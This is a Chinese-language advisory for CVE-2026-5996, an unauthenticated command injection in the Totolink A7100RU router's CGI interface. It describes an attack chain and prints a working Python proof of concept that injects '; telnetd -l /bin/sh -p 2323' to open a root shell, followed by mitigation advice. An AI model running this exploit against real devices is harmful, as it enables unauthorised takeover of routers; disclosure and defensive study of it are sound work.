CVE-2026-5996 Totolink A7100RU命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5996

漏洞类型

操作系统命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A7100RU

漏洞概述

Totolink A7100RU路由器7.4cu.2313_b20191024版本存在严重安全漏洞。该漏洞位于/cgi-bin/cstecgi.cgi文件的setAdvancedInfoShow函数中，由于未对tty_server参数进行有效过滤，攻击者可在无需认证的情况下，通过网络向受影响设备发送特制数据包，进而注入并执行任意操作系统命令。此漏洞可能导致攻击者完全控制设备，造成敏感信息泄露、数据篡改或服务中断。

技术细节

该漏洞源于Totolink A7100RU路由器CGI接口的输入验证机制缺失。具体受影响组件为/cgi-bin/cstecgi.cgi中的setAdvancedInfoShow函数。当该组件处理请求时，直接将用户提交的tty_server参数传递给后台系统调用，未经过滤或转义。攻击者可利用此缺陷，通过构造包含特定Shell元字符（如分号、反引号）的恶意数据包，注入并执行任意操作系统指令。鉴于该漏洞无需用户交互且无需身份验证，攻击者只需向目标端口发送特制的HTTP请求即可触发。成功利用后，攻击者可获得设备最高权限，执行读取配置、安装后门或破坏系统等高危操作。

攻击链分析

STEP 1

侦查

攻击者扫描网络，识别出运行固件版本为7.4cu.2313_b20191024的Totolink A7100RU路由器。

STEP 2

构造恶意请求

攻击者构造一个针对/cgi-bin/cstecgi.cgi接口的HTTP POST请求，指定function为setAdvancedInfoShow，并在tty_server参数中注入恶意Shell命令（如启动后门）。

STEP 3

命令注入

路由器接收到请求后，CGI程序直接处理tty_server参数，由于缺乏过滤，注入的命令被系统后端执行。

STEP 4

获取控制权

恶意命令执行成功，攻击者获得设备Root权限，可远程控制路由器或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target URL of the vulnerable CGI endpoint
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    
    # Headers mimicking a legitimate browser request
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Vulnerable payload: Injecting a command to enable telnet
    # The 'function' parameter triggers the specific handler
    # The 'tty_server' parameter is the injection point
    # Payload: ;telnetd -p 2323  (starts a telnet daemon on port 2323)
    data = {
        "function": "setAdvancedInfoShow",
        "tty_server": "; telnetd -l /bin/sh -p 2323"
    }

    try:
        print(f"[*] Sending payload to {url}...")
        response = requests.post(url, headers=headers, data=data, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully!")
            print("[+] Check if telnet is running on port 2323.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the target IP address
    target = "192.168.1.1"
    exploit(target)

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施

如果无法立即升级固件，建议通过防火墙规则禁止外部网络对路由器管理端口（通常是80/443）的访问，仅允许可信的内网IP进行管理。同时，应定期检查路由器系统进程和运行状态，发现异常进程及时断网重启。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5996
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5996
3 Details https://www.cvedetails.com/cve/CVE-2026-5996/
4 VulDB https://vuldb.com/cve/CVE-2026-5996
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_168/README.md
6 Link https://vuldb.com/submit/792044
7 Link https://vuldb.com/vuln/356550
8 Link https://vuldb.com/vuln/356550/cti
9 Link https://www.totolink.net/